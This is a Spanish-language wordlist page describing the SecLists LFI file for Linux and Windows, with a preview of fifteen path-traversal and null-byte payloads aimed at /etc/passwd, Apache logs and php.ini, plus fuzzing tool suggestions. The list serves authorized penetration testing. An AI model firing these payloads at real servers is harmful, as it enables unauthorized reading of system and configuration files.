Skip to content
Contenido web31.2 KB

LFI Linux and Windows Paths (SecLists)

Payloads de inclusión de archivos locales (LFI) dirigidos a archivos de registro y configuración tanto de Linux como de Windows, con variantes de traversal y byte nulo.

Ver fuente
Tamaño
31.2 KB
Categoría
Contenido web
Fuente
danielmiessler/SecLists
Licencia
MIT
Herramientas recomendadas
ffufwfuzzferoxbuster

Vista previa

Las primeras 15 entradas. Descarga o copia la lista completa (31.2 KB) con los botones de arriba.

>head lfi-linux-windows-1n3.txt31.2 KB
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/apache/logs/access.log
/apache/logs/access.log 
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log 
/apache/logs/error.log%00
/apache2/logs/access.log
/apache2/logs/access.log 
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log 
/apache2/logs/error.log%00
/apache\php\php.ini
/apache\php\php.ini 

Payloads de inclusión de archivos locales (LFI) dirigidos a archivos de registro y configuración tanto de Linux como de Windows, con variantes de traversal y byte nulo.

Esta lista está orientada al descubrimiento de contenido web y directorios. Contiene aproximadamente 31.2 KB y combina bien con herramientas como ffuf, wfuzz, feroxbuster. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y más sigilosas para los ataques en línea, mientras que las más grandes ofrecen una cobertura más amplia para el trabajo fuera de línea, donde la velocidad es una limitación menor.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de danielmiessler/SecLists y distribuida bajo MIT. Utiliza las listas de palabras únicamente contra sistemas que tengas autorización explícita para probar.